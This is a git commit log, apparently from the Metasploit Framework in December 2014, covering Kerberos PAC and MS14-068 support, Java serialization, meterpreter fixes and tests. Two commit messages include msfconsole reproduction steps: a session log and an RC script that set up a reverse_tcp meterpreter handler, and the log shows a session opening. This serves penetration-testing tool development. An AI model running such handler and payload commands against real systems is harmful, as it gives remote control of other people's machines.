b121e2c3fd
adds a get and getg method besides the already existing set/setg and unset/unsetg
2015-01-02 12:40:24 +01:00
056046f38b
update wordpress readme regex
2015-01-01 23:13:20 +01:00
6d966dbbcf
Land #4203 , @jvazquez-r7's cleanup for java_rmi_server
2014-12-31 11:25:19 -05:00
92bdf42496
Land #3594 , jvazquez-r7's linux meterpreter migration support
2014-12-31 09:20:44 -06:00
4f11dc009a
fixes #4490 , class.to_s should not be used for checks
2014-12-31 10:46:24 +01:00
722f86f361
Try to guess TMPDIR folder
2014-12-30 18:39:29 -06:00
7596d211e9
Use length for comparision
2014-12-30 18:39:18 -06:00
e903044fd5
Allow to provide writable dir
2014-12-30 18:36:30 -06:00
f17a7e8a61
Better handling of the unix domain socket argument
2014-12-30 18:36:28 -06:00
4df4e8b9d6
Add support for linux meterpreter migration
2014-12-30 18:34:24 -06:00
56df2d0062
Add support for linux meterpreter migrate types
2014-12-30 18:30:15 -06:00
553030b22d
Land #4473 - Log backtraces by default
2014-12-30 18:13:33 -06:00
135faeee29
Land #4095 , specs for Rex::OLE
2014-12-30 14:25:09 -06:00
6444d8ba64
use kind_of? for checking exceptions
2014-12-30 21:16:57 +01:00
ce0bbca6ed
Land #4487 , no spinnerz on Windows :(
2014-12-30 14:06:05 -06:00
a8e907d68b
Land #4479 , nil comparisons and missing DLLs
...
Also fixes #4474 .
2014-12-30 13:55:54 -06:00
bdac5db695
remove usage of ==/!= nil
...
Adjust all module-loading libraries to have consistent nil?/!nil? checking and
'if' style.
2014-12-30 10:59:49 -06:00
6ded5a7eb4
Avoid spinner on Windows
...
Fixes #4147 , probably.
2014-12-30 10:17:56 -06:00
d727ac5367
Alias Rex::Ui::Text::Output::Tee print_raw to write, fixes #4469 and #4363
2014-12-29 16:47:04 -08:00
9af3fd01d4
Fix response_timeout
...
response_timeout is a method specific to a meterpreter session, not
shell. So if the user is using a shell type payload, he will never
see a backtrace before interacting with the sessions.
2014-12-29 17:03:50 -06:00
555713b6ae
Land #4456 - MS14-068, Kerberos Checksum (plus krb protocol support)
2014-12-29 16:09:28 -06:00
f9b141c1e2
Land #4442 , wchen-r7's configurable session response timeout option
...
fixes #4431
2014-12-29 13:02:47 -06:00
5d70b837ed
handle nil results from MeterpreterBinaries.path
...
When a meterpreter binary cannot be found, give the user some hint about what
went wrong.
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.43.1
lhost => 192.168.43.1
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.43.252
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.252:49297) at 2014-12-29 12:32:37 -0600
meterpreter > use mack
Loading extension mack...
[-] Failed to load extension: No module of the name ext_server_mack.x86.dll found
```
This is also useful for not scaring away would-be developers who replaced only
half (the wrong half) of their DLLs from a fresh meterpreter build and
everything exploded. Not that thats ever happened to me :)
2014-12-29 12:34:02 -06:00
72eb8e6503
Land #4475 , inverted timeout fix
2014-12-29 11:37:28 -06:00
bbb41c39b8
fix backward meterpreter packet timeout logic
...
The current logic times out every packet almost immediately, making it possible
for almost any non-trivial meterpreter session to receive duplicate packets.
This causes problems especially with any interactions that involve passing
resource handles or pointers back and forth between MSF and meterpreter, since
meterpreter can be told to operate on freed pointers, double-closes, etc.
This probably fixes tons of heisenbugs, including #3798 .
To reproduce this, I enabled all debug messages in meterpreter to slow it
down, then ran this RC script with a reverse TCP meterpreter, after linking in
the test modules:
(cd modules/post
ln -s ../../test/modules/post/test)
die.rc:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
exploit -j
sleep 5
use post/test/services
set SESSION 1
run
2014-12-29 08:15:51 -06:00
3a73b40a1e
more error handling
2014-12-29 00:39:00 +01:00
7b52bcb657
log errors into framework.log
2014-12-29 00:20:26 +01:00
04772c8946
Ensure stop_service closes Rex::Proto::Http::Server
2014-12-26 13:50:03 -06:00
c1b0385a4b
Land #4460 , @Meatballs1's ssl cert validation bypass on powershell web delivery
2014-12-26 12:07:45 -06:00
d148848d31
Support Kerberos error codes
2014-12-24 18:05:48 -06:00
725a17c70b
override default attr for OptRegexp
...
Rather than literally returning the default Regex object, override the accessor
to return the string representation. This allows the RPC backend to properly
serialize the options hash values, since msgpack does not know how to serialize
a Regexp object. Fixes #3798 .
To verify the fix, run the steps for issue #3798 and ensure that the module
options are returned instead of a backtrace. Also, ensure that the module
continues to work as expected:
```
$ ./msfconsole -q
msf > use auxiliary/scanner/http/scraper
msf auxiliary(scraper) > info
Name: HTTP Page Scraper
Module: auxiliary/scanner/http/scraper
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
et <et@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The test path to the page to analize
PATTERN (?i-mx:<title>(.*)<\/title>) yes The regex to use (default regex is a sample to grab page title)
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
override default attr for OptRegexp
Description:
Scrap defined data from a specific web page based on a regular
expresion
msf auxiliary(scraper) > set RHOSTS lwn.net
RHOSTS => lwn.net
msf auxiliary(scraper) > set RHOSTS 72.51.34.34
RHOSTS => 72.51.34.34
msf auxiliary(scraper) > set VHOST lwn.net
VHOST => lwn.net
msf auxiliary(scraper) > run
[*] [72.51.34.34] / [Welcome to LWN.net [LWN.net]]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
2014-12-24 09:57:14 -06:00
05a9ec05e8
raise NotImplementedError
2014-12-23 19:59:37 -06:00
4493b3285c
Raise NoMethodError for methods designed to be overriden
2014-12-23 19:51:41 -06:00
fee033d6df
Use Rex::Text.md5_raw
2014-12-23 19:30:23 -06:00
c2bcde24ef
Land #4377 , Support DYNAMIC_BASE templates - resolves #4366
2014-12-23 11:57:33 +00:00
b41e259252
Move it to a common method
2014-12-23 11:16:07 +00:00
e974d272f0
Remove stray line comment that ruined things when minified.
2014-12-23 00:22:50 -06:00
13ec578d1a
Revert "Back to Create OpenSSL::BN from string"
...
This reverts commit 635a54ca94
2014-12-22 23:17:03 -06:00
635a54ca94
Revert "Create OpenSSL::BN from string"
...
This reverts commit fe99b65a62
2014-12-22 19:14:07 -06:00
fe99b65a62
Create OpenSSL::BN from string
2014-12-22 18:44:47 -06:00
d12b43d257
Use Intege.new
2014-12-22 18:37:07 -06:00
f37cf555bb
Use random subkey
2014-12-22 15:39:08 -06:00
ad97457a39
Move more constants to Crypto
2014-12-22 15:27:16 -06:00
75a2846377
Add more PAC constants
2014-12-22 15:14:46 -06:00
5a6c915123
Clean options
2014-12-22 14:37:37 -06:00
bcf659792e
Restore original timeout
2014-12-22 12:34:52 -06:00
f3b263f57d
Use more crypto constants
2014-12-22 12:13:23 -06:00
b96d172ccc
Use constant names
2014-12-22 11:58:59 -06:00
ff208002d7
Reorganize the Crypto mixin
2014-12-22 11:57:35 -06:00
7a45918ecc
Add specs for Msf::Kerberos::Client::TgsRequest
2014-12-22 11:28:24 -06:00
8c62822ab9
Add specs for Msf::Client::Kerberos::AsRequest
2014-12-22 09:34:21 -06:00
b469ff3567
Add doc references to Msf::Kerberos::Client::CacheCredential
2014-12-22 08:54:09 -06:00
1f3eded4a8
Add specs for Msf::Kerberos::Client::CacheCredential
2014-12-21 23:47:40 -06:00
7cb27408b2
Add doc references por spec'd mixins
2014-12-21 21:03:58 -06:00
60d4525632
Add specs for Msf::Kerberos::Client::Pac
2014-12-21 17:49:36 -06:00
e219b0b249
Add specs for Msf::Kerberos::Client::AsResponse
2014-12-21 01:12:00 -06:00
9f1403a63e
Add initial specs for Msf::Kerberos::Client::TgsResponse
2014-12-20 20:29:00 -06:00
5f0c3ebb2b
Add documentation for Msf::Kerberos::Client::TgsResponse and TgsRequest
2014-12-20 19:32:38 -06:00
ffb319d703
Add documentation for Msf::Kerberos::Client::AsRequest
2014-12-20 18:57:49 -06:00
8929cbd6b3
Fix typo
2014-12-20 18:29:50 -06:00
e35218b6f1
Add documentation for Msf::Kerberos::Client::CacheCredential
2014-12-20 18:28:36 -06:00
ca75b4b74a
Add documentation for Msf::Client::Kerberos::Pac
2014-12-20 01:36:54 -06:00
cf13dc8d53
Do build_ap_req
2014-12-20 01:25:20 -06:00
422d3ce9b5
Take more care of options on build_tgs_request
2014-12-20 01:13:56 -06:00
ad8bbf4477
Rescue rescue Rex::TimeoutError so the iteration can keep going
2014-12-20 01:12:30 -06:00
a8e3ee033c
Fix #4431 - Support arbitrary session response timeout
...
Fix #4431
2014-12-20 00:25:02 -06:00
cd16e11b22
Make checksum from a method
2014-12-19 20:08:15 -06:00
b0ac68fbc3
Create build_subkey method
2014-12-19 19:46:57 -06:00
4a106089b9
Move options to build_tgs_request_body
2014-12-19 19:12:17 -06:00
e6781fcbea
Build AuthorizationData from the module
2014-12-19 18:59:39 -06:00
9bd454d288
Build PAC extensions from the module
2014-12-19 18:47:41 -06:00
04ef087434
Delete Microsoft namespace from the mixin
2014-12-19 18:41:27 -06:00
b78765e584
Create PAC mixin component
2014-12-19 18:36:02 -06:00
f332860c19
Clean creation of client and server principal names
2014-12-19 18:16:22 -06:00
bd85723a9d
Build pre auth array out of the mixin
2014-12-19 18:10:14 -06:00
d3050de862
Remove references to Redmine in code
...
See #4400 . This should be all of them, except for, of course, the module
that targets Redmine itself.
Note that this also updates the README.md with more current information
as well.
2014-12-19 17:27:08 -06:00
9cfc52b5af
Extract build_as_request_body
2014-12-19 17:00:39 -06:00
fcb801c729
Add Timeout datastore option
2014-12-19 16:53:12 -06:00
d058bd5259
Refact extraction of kerberos cache credentials
2014-12-19 15:53:24 -06:00
337b2d784f
Land #4416 , define rails version dep in one place
...
* Bump rails to 3.2.21
2014-12-19 15:17:54 -06:00
db0aeb2a05
Make the version constraint a range
2014-12-19 13:54:13 -06:00
650a68c994
Fix jcxz to jecxz for x86_64 in metasm
...
This fixes "invalid opcode near 'jecxz'" for x64 metasm encoding.
2014-12-19 13:34:56 -06:00
fad08d7fca
Add specs for Rex Kerberos client
2014-12-19 12:14:33 -06:00
c493ccfc06
Define the Rails version constraint in a library constant
2014-12-19 11:46:39 -06:00
f4037b1003
Clean Kerberos Rex client code
2014-12-19 11:08:48 -06:00
dfa92da287
Add TODO
2014-12-19 01:13:56 -06:00
77e2d4d90d
Add documentation for the Kerberos PAC support classes
2014-12-19 01:12:14 -06:00
fda4cd3440
Fix some Rex Kerberos model documentation
2014-12-18 19:30:12 -06:00
c426cf32d0
Add specs for Rex::Proto::Kerberos::CredentialCache::Principal
2014-12-18 17:40:06 -06:00
16d5ee1aae
Add documentation for the rex credential cache support
2014-12-18 17:12:58 -06:00
7275f5a5f2
Allow Rex to load credential_cache
2014-12-18 16:32:21 -06:00
f325d2f60e
Add support for cache credentials in the mixin
2014-12-18 16:31:46 -06:00
723998e1d4
Land #4425 , jobs tab completion NilClass fix
2014-12-18 15:25:57 -06:00
400bd9a094
Fix jobs NilClass tab complete bug
2014-12-18 15:43:04 -05:00
80cd04d76a
Land #4332 , test optimization for Cucumber
...
* Make Cuke run faster on TravisCI
2014-12-18 09:34:55 -06:00
0a61e108ea
Add code skeleton for credential_cache
2014-12-18 00:30:47 -06:00
0f19f3cf2e
Add classes templates
2014-12-17 23:16:58 -06:00
f3f6a64f02
Add some AS response methods to a mixin
2014-12-17 19:50:42 -06:00
8e570cc19b
Initial support to send TGS-REQ
2014-12-17 18:55:30 -06:00
549f3c69ff
Dont crash when tab complete threads command with typos
2014-12-17 19:36:04 -05:00
698ca2639b
Do not delete files that do not exist in rm_f
2014-12-17 09:18:06 -05:00
662160ef61
Refactor mixin
2014-12-16 23:48:53 -06:00
594b9bcfc2
Add support for AuthorizationData
2014-12-16 23:21:13 -06:00
9de4137aa7
Patch UA/Proxy settings during migration, lands #3632
2014-12-16 22:21:48 -06:00
370f6003e3
Refactors metsrv patching in reverse_hop_htt.rb
2014-12-17 11:57:17 -05:00
1930eb1bf8
Refactors metsrv patching in reverse_http.rb
2014-12-17 10:04:43 -05:00
2649d482fe
Add support for KRB_AP_REQ
2014-12-16 18:39:42 -06:00
0f55a98450
Add support for Authenticator encoding
2014-12-16 17:45:54 -06:00
dde45a7f53
Add support for Checksum encoding
2014-12-16 17:05:35 -06:00
a93cbac7bf
Support ticket encoding
2014-12-16 16:04:13 -06:00
ce6b53b44c
Fix attribute description
2014-12-16 11:39:04 -06:00
a5f8b4319f
Add support to encode PAC-TYPE
2014-12-16 11:31:27 -06:00
1721641138
Add support for PAC-LOGON-INFO
2014-12-16 09:32:47 -06:00
c2bc79c53c
Resolves #4275 - Configurable variable name as an option
...
Resolves #4275
2014-12-15 23:59:34 -06:00
52b3025351
Reworked to avoid extending String class on blob per hdm's rec.
2014-12-15 21:40:41 -05:00
c1114c180a
Add support for PAC-CLIENT-INFO
2014-12-15 17:32:51 -06:00
64a0162e3f
Add support for PAC-SERVER-CHECKSUM
2014-12-15 17:16:43 -06:00
482c883d36
Add the parent class for pac elements
2014-12-15 17:13:52 -06:00
2c7139b936
Add support for PAC-PRIVSRV-CHECKSUM
2014-12-15 17:13:22 -06:00
4c994d84e0
Updating version to 4.11 for Flood release
2014-12-15 14:42:09 -06:00
147ff13080
Add support to decode the encryption part of as responses
2014-12-15 11:47:08 -06:00
643279b54b
Add support to decode the encryption part of as responses
2014-12-15 11:46:11 -06:00
c24fdb81b5
Land #4389 , Meatballs1's fix for enum_ad_* post module regressions
...
Fixes #4387 by adjusting for the new return type from ADSI queries.
2014-12-15 10:45:12 -06:00
d81cdd6cbb
Add KdcResponse spec first draft
2014-12-14 21:20:54 -06:00
c3a2bcf956
Make KdcResponse decoding better
2014-12-14 21:01:09 -06:00
442adb080f
Add first support to decode tickets
2014-12-14 20:51:26 -06:00
35742873c7
Delete references to deleted namespaces
2014-12-14 19:23:21 -06:00
78c76092dd
Delete namespaces from model classes
2014-12-14 19:18:30 -06:00
13ae624738
Delete namespaces
2014-12-14 19:15:57 -06:00
2d0cb5acd8
Move elements to model dir
2014-12-14 19:11:21 -06:00
328e9f62e8
Add first draft for Kerberos responses
2014-12-14 19:09:41 -06:00
483c273e17
Add support to decode responses on the Rex client
2014-12-14 17:54:17 -06:00
883bfd1f46
Add support to retrieve e-data
2014-12-14 17:23:37 -06:00
7067f2ea83
Modify Rex::Proto::Kerberos::Client to read responses
2014-12-14 16:32:25 -06:00
c5dc065fde
Add support for decoding KrbError
2014-12-14 16:26:18 -06:00
704781d0ce
Modify exception message
2014-12-14 12:11:09 -06:00
8435328af7
Fix create_tcp_connection
2014-12-14 00:54:26 -06:00
0abf5d147e
Add some documentation
2014-12-14 00:51:44 -06:00
e2617c7095
Return the workspace id in responses, lands #4142
2014-12-13 18:04:58 -06:00
00590f9f26
Adds Java serialization support, lands #4327
2014-12-13 17:47:53 -06:00
6ea5ed1a82
Shrinks windows payloads, lands #4391
2014-12-13 17:41:50 -06:00
f67a32ef9c
Add missing commits from #3770 , lands #4393
2014-12-13 17:36:26 -06:00
19adfca8ce
Updated stubs from source
2014-12-13 12:55:41 -06:00
5d18de2ebf
Fix legacy railgun LDAP implementation
2014-12-13 18:26:26 +00:00
92490ab5e8
Singles updated from the source
2014-12-13 12:22:07 -06:00
4681416a0f
Update block_api with @schierlm's changes
2014-12-13 12:06:38 -06:00
bde8c380c2
Make mixin run
2014-12-13 02:46:00 -06:00
f676b72767
Add Kademlia scanner, lands #4210
2014-12-12 16:40:58 -06:00
9545b6e4d6
Land #4343 , os_flavor reduction
2014-12-12 14:49:15 -06:00
ac004d2770
Fix bruteforce validators to accept nil
...
bruteforce_speed isn't always required, because the speed checker
already handles nil (and presumes the user wants the fastest possible).
See also MSP-11842
2014-12-12 13:57:37 -06:00
177cade6a5
Merge branch 'land-4274-ssl' into temp
2014-12-12 13:25:54 -06:00
985245e8a1
Document method
...
Fix #4366 (support dynamic_base templates)
2014-12-12 01:22:32 -06:00
78eb3325bc
Add initial Rex Client and mixin
2014-12-12 01:20:14 -06:00
b8e58d0f04
Support 32 and 64-bit for exe-only, and fix -k
2014-12-12 01:13:09 -06:00
fef9c67b0e
Land #3175 , OJ's TLV group refactoring
2014-12-11 22:12:35 -06:00
8140ed4a45
Merge branch 'upstream-master' into land-3175
2014-12-11 22:03:03 -06:00
d311059e75
Fix DYNAMIC_BASE templates
2014-12-11 20:44:03 -06:00
0c1d02c940
Fix event handlers on ruby 2
...
Fixes #4219
2014-12-11 20:08:45 -06:00
20836c1789
Refactor crypto usage
2014-12-11 18:18:37 -06:00
0b2fd7ffec
Update PreAuthEncTimeStamp#encrypt documentation
2014-12-11 17:08:04 -06:00
424ce6ad53
Add constant with CRYPTO_MSG_TYPE
2014-12-11 17:03:46 -06:00
38a0506f2d
Refactor Crypto
2014-12-11 17:00:46 -06:00
35f02e6796
Add support to encode KdcRequest
2014-12-11 15:51:54 -06:00
47c38ed04e
Merge pull request #4364 from todb-r7/bug/bruteforce-speed-3904
...
Modules should respect bruteforce_speed again
2014-12-11 13:19:42 -06:00
d96206b813
Support KdcRequest#encode
2014-12-11 12:44:17 -06:00
4eaf64afef
Don't lie about stop_on_success
...
This absolutely needs to be honored too, though.
See #4365 .
2014-12-11 12:37:13 -06:00
3f12c5c9c5
Redo decode_asn1
2014-12-11 12:34:47 -06:00
8d6e41fae3
Add documentation for KdcRequest
2014-12-11 12:27:26 -06:00
162d2d39b5
Add support for KdcRequestBody decoding
2014-12-11 12:19:26 -06:00
edf541fabe
Fix some double spacing
2014-12-11 09:39:15 -06:00
39ffc0c58a
Add support for PreAuthData#encode
2014-12-10 19:48:44 -06:00
b89dee03c6
Add PreAuthEncTimeStamp#encode support
2014-12-10 19:30:21 -06:00
3accdb705b
Add support for PreAuthPacRequest#encode
2014-12-10 19:18:19 -06:00
96c1370334
Add EncryptedData#encode support
2014-12-10 19:12:24 -06:00
543ec35a01
Refactor PrincipalName#encode
2014-12-10 18:57:23 -06:00
5d2ff5982e
Add support for PreAuthEncTimeStamp decoding/decrypting
2014-12-10 18:33:46 -06:00
0eea9a02a1
Land #3144 , psexec refactoring
2014-12-10 17:30:39 -06:00
9202c4f2a1
No mercy for os_flavor
2014-12-10 11:46:21 -06:00
785ff60d8e
Add inital support for PreAuthEncTimeStamp
2014-12-10 11:25:48 -06:00
8ec403af89
Add support for PA-PAC-REQUEST
2014-12-10 10:51:37 -06:00
6ebfbe7271
Prefix coding
2014-12-10 09:54:57 -06:00
11acba3324
Prefix coding
2014-12-10 09:52:23 -06:00
6653502e68
Support pa_data parsing on kdc_request
2014-12-10 09:47:31 -06:00
cc909ba402
Add documentation for PreAuthData
2014-12-09 19:57:16 -06:00
18819ad6b9
Prefix Rex
2014-12-09 19:37:42 -06:00
0a6e42968b
Add inital support for padata
2014-12-09 19:28:40 -06:00
e62628f1cc
Make specs pass
2014-12-09 18:52:42 -06:00
2557780e7c
Add initial support to decode kdc requests
2014-12-09 18:48:08 -06:00
bed1e06d13
Mark EncryptedData encode as unsupported atm
2014-12-09 17:06:51 -06:00
82549315ff
Mark KdcRequestBody encode as unsupported atm
2014-12-09 17:05:20 -06:00
b84840a596
Add support to decode TGS_REQ body
2014-12-09 16:51:34 -06:00
f236438290
Add initial support for EncryptedData
2014-12-09 16:40:44 -06:00
2725235bc1
Add require for EncryptedData
2014-12-09 16:28:37 -06:00
c5865c6fec
Add initial design draft
2014-12-09 15:53:29 -06:00
09617f990b
Implement BRUTEFORCE_SPEED respect (telnet)
...
This implements just for telnet, but assuming this strategy is kosher,
it's not too painful to add for the rest of the LoginScanner using the
old defaults used by `AuthBrute`.
See #3904 , @dmaloney-r7 or @jlee-r7
2014-12-09 15:40:43 -06:00
d74a8f6c41
Include the datastore options for the encoder too
2014-12-09 16:32:41 -05:00
a584a5982f
Clarify about how BES uses os_flavor
...
We don't. We don't use os_flavor anymore because it is no longer
implemented. We get the information from os_name instead.
2014-12-09 12:21:59 -06:00
c670bb72df
Land #4337 - Fix prompt coloring on Windows
2014-12-09 11:53:35 -06:00
42710cc32e
Error messages for the python meterpreter
2014-12-09 11:03:57 -06:00
5f730277cf
Fix prompt coloring on Windows
...
MSP-11669
Set output stream for RbReadline (rl_outstream) to the
Rex::Ui::Text::Output::Stdio, which will use translate the ANSI color
escapes to set_color calls in Windows.
2014-12-08 14:31:00 -06:00
8c0610cb7a
Merge branch 'master' into feature/MSP-11671/test-optimization
...
MSP-11671
Conflicts:
.travis.yml
2014-12-08 08:46:22 -06:00
564da4446e
Add print friendly to_s
2014-12-07 17:52:09 -06:00
19effa7eb9
Fix feedback's review
2014-12-06 21:47:55 -06:00
21742b6469
Test #3729
2014-12-06 21:20:52 -06:00
2c290e2004
Use classes short name
2014-12-05 20:16:50 -06:00
8f403f3eea
Update documentation
2014-12-05 20:11:45 -06:00
03740df931
Support serialization
2014-12-05 19:55:52 -06:00
785006b684
Use references
2014-12-05 19:12:05 -06:00
ae608b1311
Add references to stream when possible
2014-12-05 17:35:38 -06:00
13d8058fe5
Fill stream attribute
2014-12-05 17:14:37 -06:00
39790a95a0
Land #4313 , @wchen-r7's fix for #4304
2014-12-05 15:08:35 -08:00
ca164cd99f
Support the stream attribute
2014-12-05 16:52:59 -06:00
90e2bbbff5
Refactor Contents
2014-12-05 16:05:35 -06:00
da92e4705c
Land #4319 , @wchen-r7's fix for #4307
2014-12-05 12:08:39 -08:00
0431720a07
Land #4294 , msfconsole speedups on module load
...
Related to #4257 and #4195 vaguely, and possibly even #4147 .
2014-12-05 13:45:11 -06:00
2241653cb6
Delete self.stream initialization
2014-12-05 12:44:04 -06:00
f5a19b9b41
Add support to decode TC_REFERENCE
2014-12-05 12:42:27 -06:00
abf199f924
Remove junk code
2014-12-05 11:01:34 -06:00
1653101da4
Add support for Arrays of Objects
2014-12-04 20:31:38 -06:00
8e5dc27546
Support Objects with super classes
2014-12-04 19:19:42 -06:00
4b8bdad44b
Refactor contents serialization
2014-12-04 18:28:25 -06:00
cfc1acfcae
Fix #4307 - Check action for nil
...
Auxiiary modules already do this, but looks like we forgot to do the
same for post modules.
I also changed the error to allow "reason" in order to be more
informative about what the user should do.
Fix #4307
2014-12-04 17:07:59 -06:00
743e9fca9d
Correctly set default SECRET
2014-12-04 14:06:22 -08:00
1e423f415e
Add missing opt ,
2014-12-04 14:05:17 -08:00
7f425fc3ab
Configurable fix for #4305
...
Rename UDP_SECRET to just SECRET, as it is used for more than just UDP
Rename and properly document GATEWAY option
Introduce an option to configure what UDP port will be probed
2014-12-04 13:17:34 -08:00
186d8bd359
Fix starts_with?
2014-12-04 20:16:56 +00:00
f22d7191cd
Test fix for #4305
2014-12-04 10:59:57 -08:00
9cc04e59eb
Fix #4304 - Blank password is tried when it shouldn't happen
...
Fix #4304
2014-12-04 12:59:51 -06:00
08f69da41a
Undo to_s methods
2014-12-04 12:48:05 -06:00
b80f6c34c0
Add tool to deserialize streams from files
2014-12-04 12:47:02 -06:00
d8b1401545
Test fix for #4306
2014-12-03 19:54:31 -08:00
08fe467452
Add Stream specs
2014-12-03 19:31:46 -06:00
2c8f66bba2
Add support for Reset
2014-12-03 18:50:56 -06:00
fb246ac943
Add support for (de)serialization of contents
2014-12-03 18:50:31 -06:00
3e8b8390dd
Add support for Java Streams
2014-12-03 17:59:00 -06:00
6cb6252914
Add YARD documentation for NewObject
2014-12-03 17:34:12 -06:00
d0fcbf2cdb
Add support for simple Objects really
2014-12-03 17:22:23 -06:00
2b91d5013e
Add support for simple Objects
2014-12-03 17:21:11 -06:00
8f2e444aca
Land #4281 , ::Queue workarounds for 2.1.x
...
Conflicts:
lib/msf/core/handler/reverse_tcp.rb
2014-12-03 15:48:20 -06:00
fbea369043
Check nils before encoding
2014-12-03 15:06:28 -06:00
0560cc2fe9
Fix typos
2014-12-03 14:59:38 -06:00
268157d42f
Add support for Java Enums
2014-12-03 14:50:03 -06:00
f0139d6aad
Fix some docu typos
2014-12-03 14:34:17 -06:00
0cd51553ed
Raise error on unsupported ClassDesc
2014-12-03 14:00:10 -06:00
6deb88af6b
Add support for arrays
2014-12-03 13:55:12 -06:00
b9023e8fcc
Split ClassDescription into ClassDesc and NewClassDesc
2014-12-03 00:38:27 -06:00
db45f4c620
Delete ClassDescription
2014-12-02 23:56:55 -06:00
1f535a41ca
Move types to the Serialization module
2014-12-02 20:02:42 -06:00
2c070c450b
Add support for ClassDescription
2014-12-02 17:31:53 -06:00
f6f0050f56
Fix #3886 - Backtrace for #check when session is invalid
...
If the user supplies an invalid session (as in not on the session
list), it will cause a backtrace, because the setup method from
Msf::PostMixin isn't actually called.
We have thought about implementing this in a new OptSession instead.
But you can't use or even pass framework to option_container.rb, so
this is NOT possible.
The original PR was #3956 .
2014-12-02 17:22:46 -06:00
e9e584e107
Raise exceptions when unserialization isn't possible
2014-12-02 15:31:31 -06:00
fb439258b9
Land #4298 , arbitrary Ruby extension for replicant
...
MSP-11673
* Adds Msf::Module#register_extensions
* Extensions are arbitrary Ruby modules
* Allows overriding of psuedo callbacks
2014-12-02 14:59:37 -06:00
f696a5ab0e
msfconsole --defer-module-loads
...
MSP-11671
Add command line option --defer-module-loads to msfconsole. It will
stop `Msf::Ui::Console::Driver` from calling
`framework.modules.init_module_paths` AND
`framework.modules.refresh_cache_from_database`. This flag is only
meant to speed up msfconsole boot when modules do not need to accessed,
such as during cucumber testing of command help or command line options.
2014-12-02 14:41:32 -06:00
2a033861dc
Just use constants directly
...
MSP-11673
2014-12-02 13:12:53 -06:00
784e138b14
Extend replicants via arbitrary Ruby code
...
MSP-11673
* Implements a #register_extensions method on Msf::Module
* Any registered Ruby modules will extend the cloned module returned by #replicant
2014-12-02 12:18:30 -06:00
35ff82c9d8
Merge branch 'bug/MSP-11672/double-init-module-paths' into feature/MSP-11671/msfconsole-defer-module-loads
...
MSP-11671
2014-12-02 11:57:47 -06:00
fc96d011ab
Python reverse_http stager, lands #4225
2014-12-02 11:47:31 -06:00
622a18bc22
Add support for annotations
2014-12-02 11:42:41 -06:00
9272fe90ae
Merge branch 'master' into bug/MSP-11672/double-init-module-paths
...
MSP-11672
2014-12-02 11:23:51 -06:00
a68540cfa2
Add support for Data Block Long
2014-12-02 10:49:15 -06:00
9c5d7e66d4
Add block data support
2014-12-02 10:46:29 -06:00
90c6764426
init_module_paths once in msfconsole
...
MSP-11672
Pass `'DeferModuleLoads' => false` to `Msf::Simple::Framework.create` so
that `framework.modules.init_module_paths` is only called once (directly
in `Msf::Ui::Console::Driver#initialize`) instead of twice (in
`Msf::Simple::Framework.create` and `Msf::Ui::Console::Driver#initialize).
2014-12-02 10:28:23 -06:00
653c71e029
Fail if init_module_paths called more than once
...
MSP-11672
Calling init_module_paths takes 6 seconds on my machine even when there are no
files to that are changed just because it takes that long to walk the
directories and gather the mtime for each file. Therefore, calling it
more than once should be avoided. Also, there is no reason to call it
twice as to add paths later, `modules.add_module_paths` should be used.
2014-12-02 10:17:09 -06:00
8923b87def
Don't redefine the static decode method
2014-12-02 09:02:24 -06:00
bd3d63a155
Land #4270 , Msf::Author cleanup and improvements
2014-12-02 01:26:42 -06:00
ef2bf5b935
Add support for long-utf
2014-12-01 19:50:33 -06:00
705cd4c308
Add initial requiring file
2014-12-01 19:08:16 -06:00
5f11c70d7f
Add initial support for Java serialization
2014-12-01 19:07:45 -06:00
7e2b197f02
Document Msf::Simple::Framework.create
...
MSP-11671
2014-12-01 15:38:48 -06:00
57cabb4f10
Document Msf::Simple::Framework.simplify
...
MSP-11671
2014-12-01 15:36:38 -06:00
394d132d33
Land #2756 , tincd post-auth BOF exploit
2014-12-01 12:13:37 -06:00
c681654c10
Land #4252 - Rework meterpreter SSL & pass datastore to handle_connection()
2014-11-30 20:15:53 -06:00
f139795663
Rework queue handling and error reporting, close #4249
2014-11-28 14:56:02 -06:00
335d1ef287
Only cache auto-generated certificates
2014-11-26 21:23:08 -06:00
2bd7a67413
Restructure parts of Author, fix some doc bugs.
2014-11-26 13:54:23 -06:00
a34e721353
Check for load errors in reload_all
2014-11-25 13:13:40 -06:00
c0dab54925
Add minor missing doc
2014-11-25 07:37:49 -08:00
bedf7ed44b
Doc cleanup
2014-11-24 14:34:20 -08:00
0ed356f71c
Move Kademlia stuff to a more OO model, etc, per reviews
...
All of the work is done in rex. The msf mixin just prevents the
desire to call rex directly from the module
2014-11-24 14:03:43 -08:00
4dc1183ff5
Protecting it once seems like enough (typo)
2014-11-22 17:42:07 -06:00
8becf417a7
Qualify ::File to prevent a stacktrace
2014-11-22 17:16:13 -06:00
673e21cfaf
Rework meterpreter SSL & pass datastore to handle_connection()
...
This allows HandlerSSLCert to be used to pass a SSL certificate into the Meterpreter handler. The datastore has to be passed into handle_connection() for this to work, as SSL needs to be initialized on Session.new. This still doesn't pass the datastore into Meterpreter directly, but allows the Session::Meterpreter code to extract and pass down the :ssl_cert option if it was specified. This also fixes SSL certificate caching by expiring the cached cert from the class variables if the configuration has changed. A final change is to create a new SSL SessionID for each connection versus reusing the SSL context, which is incorrect and may lead to problems in the future (if not already).
2014-11-22 15:35:00 -06:00
823b4e259a
Make it clear SSLVersion is not advertised since it isn't used
2014-11-22 14:25:09 -06:00
842a7a38d8
Change SSLCert to HandlerSSLCert to avoid conflicts with modules
2014-11-22 14:23:56 -06:00
9ed8c59459
Bring options over from reverse_tcp (bind address, etc).
...
Also includes the SSLCert => HandlerSSLCert change
2014-11-22 14:22:54 -06:00
ba9c763f7e
Auto-generated SSL certs now match "snakeoil" defaults
...
